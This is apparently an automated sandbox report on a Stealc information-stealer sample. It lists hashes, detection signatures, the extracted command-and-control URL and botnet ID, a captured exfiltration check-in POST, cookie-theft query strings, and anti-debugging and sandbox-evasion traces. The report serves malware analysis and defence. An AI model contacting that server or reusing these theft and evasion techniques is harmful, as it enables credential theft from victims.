
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1529037
MD5: 9d007dc0dc48fd402f13f65547d002f3
SHA1: 487a3e42ebc95babcc96a71388fd35577290302d
SHA256: 6bc02402cb6ca77ef60e9e04ed1996840e9eb6088a0b9f748653d63f915edb0a
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc.) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1824 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9D007DC0DC48FD402F13F65547D002F3)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 1824 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 1824 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Source | Rule | Description | Author
0.2.file.exe.160000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T15:42:15.749488+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.160000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00167240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00169AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00169B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00178EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00174910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00174570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0016F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00173EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHI | Host: 185.215.113.37 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------EHCBAAAFHJDHJJKEBGHI Content-Disposition: form-data; name="hwid" FB73C9105E5F552815863 ------EHCBAAAFHJDHJJKEBGHI Content-Disposition: form-data; name="build" doma ------EHCBAAAFHJDHJJKEBGHI--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00164880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%hh
Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=h
Source: file.exe, 00000000.00000002.2156506568.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpft
Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37RD

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005238B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00617961
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053297F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052532C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0047F458
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052F434
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00501486
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004415CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004005E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00521D96
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053459E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00530E13
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00526E28
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050973D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052CFE6
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 001645C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: iovqbmaf ZLIB complexity 0.9948017834018891
Source: file.exe, 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2111080022.0000000004B20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00179600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00173720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\56T9UQQV.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.2156506568.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;!q
Source: file.exe | ReversingLabs: Detection: 47%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1836544 > 1048576
Source: file.exe | Static PE information: Raw size of iovqbmaf is bigger than: 0x100000 < 0x19a400

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.160000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iovqbmaf:EW;tgzswadw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iovqbmaf:EW;tgzswadw:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00179860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cf542 should be: 0x1cf5ed
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: iovqbmaf
Source: file.exe | Static PE information: section name: tgzswadw
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F704C push eax; mov dword ptr [esp], ebx | 0_2_005F70BD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017B035 push ecx; ret | 0_2_0017B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058406C push edx; mov dword ptr [esp], 3B54967Bh | 0_2_005841EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D7869 push esi; mov dword ptr [esp], 47AC6C17h | 0_2_005D78DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D7869 push edi; mov dword ptr [esp], edx | 0_2_005D78E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6044 push ebp; mov dword ptr [esp], eax | 0_2_007F605E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6044 push 07EE2D2Eh; mov dword ptr [esp], ebx | 0_2_007F6077
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6044 push ecx; mov dword ptr [esp], 5BCCEF3Eh | 0_2_007F60ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6044 push ecx; mov dword ptr [esp], eax | 0_2_007F614D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058F01B push eax; mov dword ptr [esp], 59EF7000h | 0_2_0058F05F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058F01B push 6068EFD7h; mov dword ptr [esp], eax | 0_2_0058F368
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00603023 push 40938B43h; mov dword ptr [esp], esi | 0_2_0060303E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055B012 push 77452862h; mov dword ptr [esp], ecx | 0_2_0055B057
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055B012 push eax; mov dword ptr [esp], edi | 0_2_0055B104
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056781C push eax; mov dword ptr [esp], edx | 0_2_00567882
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051900A push 7A12DBE4h; mov dword ptr [esp], ebp | 0_2_0051903E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0051900A push ecx; mov dword ptr [esp], ebx | 0_2_00519054
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053F03B push ebp; mov dword ptr [esp], 0515A3E0h | 0_2_0053F045
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6016 push ebp; mov dword ptr [esp], eax | 0_2_007F605E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6016 push 07EE2D2Eh; mov dword ptr [esp], ebx | 0_2_007F6077
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6016 push ecx; mov dword ptr [esp], 5BCCEF3Eh | 0_2_007F60ED
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F6016 push ecx; mov dword ptr [esp], eax | 0_2_007F614D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005680D7 push ebx; mov dword ptr [esp], 7CFF106Eh | 0_2_005680DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006010D1 push edx; mov dword ptr [esp], eax | 0_2_006010F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005950E5 push 5B80A24Ah; mov dword ptr [esp], ebp | 0_2_00595118
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005950E5 push 2A7D1703h; mov dword ptr [esp], ecx | 0_2_0059516E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005898E6 push ebp; mov dword ptr [esp], ecx | 0_2_0058995F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CE091 push 7AC0143Dh; mov dword ptr [esp], edx | 0_2_005CE0B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005CE091 push 0201C094h; mov dword ptr [esp], edi | 0_2_005CE0DC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005238B2 push edx; mov dword ptr [esp], edi | 0_2_00523901
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005238B2 push 2E358536h; mov dword ptr [esp], eax | 0_2_0052391E
Source: file.exe | Static PE information: section name: iovqbmaf entropy: 7.9538207256362705

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13601
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53918C second address: 53919C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F3F244F40E2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BB7B second address: 53BC34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3F244F40E7h 0x0000000f nop 0x00000010 mov cx, 62AEh 0x00000014 push 00000000h 0x00000016 mov esi, 6400E677h 0x0000001b mov edx, edi 0x0000001d push 221B2ED3h 0x00000022 pushad 0x00000023 jnp 00007F3F244F40DCh 0x00000029 jc 00007F3F244F40D6h 0x0000002f jmp 00007F3F244F40E3h 0x00000034 popad 0x00000035 xor dword ptr [esp], 221B2E53h 0x0000003c call 00007F3F244F40E8h 0x00000041 mov esi, dword ptr [ebp+122D298Ch] 0x00000047 pop edi 0x00000048 push 00000003h 0x0000004a mov esi, 15CCECFCh 0x0000004f push 00000000h 0x00000051 jng 00007F3F244F40DCh 0x00000057 sub esi, 238242C3h 0x0000005d push 00000003h 0x0000005f push edx 0x00000060 mov dword ptr [ebp+122D1EEEh], eax 0x00000066 pop edx 0x00000067 call 00007F3F244F40D9h 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f jnl 00007F3F244F40D6h 0x00000075 pushad 0x00000076 popad 0x00000077 popad 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BC34 second address: 53BC72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE2705h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F3F24EE26FAh 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3F24EE2704h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BC72 second address: 53BC78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BC78 second address: 53BCF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push esi 0x0000000b jmp 00007F3F24EE2703h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jmp 00007F3F24EE2707h 0x0000001a pop eax 0x0000001b jmp 00007F3F24EE2707h 0x00000020 lea ebx, dword ptr [ebp+1244D765h] 0x00000026 jmp 00007F3F24EE26FCh 0x0000002b xchg eax, ebx 0x0000002c jmp 00007F3F24EE26FEh 0x00000031 push eax 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53BCF1 second address: 53BCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E357 second address: 54E363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F3F24EE26F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559A9B second address: 559AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559AA0 second address: 559AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559AA5 second address: 559AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F244F40E0h 0x00000009 jno 00007F3F244F40D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559AC4 second address: 559ACE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3F24EE26F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DB5 second address: 559DD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40DCh 0x00000007 jbe 00007F3F244F40D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 je 00007F3F244F40D6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DD8 second address: 559DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3F24EE2705h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559DF7 second address: 559E0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3F244F40DCh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559E0B second address: 559E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559E13 second address: 559E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559FA8 second address: 559FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3F24EE26F6h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 559FB3 second address: 559FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F244F40DBh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A3CD second address: 55A3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3F24EE2700h 0x00000009 jo 00007F3F24EE26F6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F3F24EE26F6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A3F0 second address: 55A3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55A9D2 second address: 55A9E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3F24EE26FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55AB3F second address: 55AB6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F3F244F40E3h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3F244F40E2h 0x00000014 rdtsc
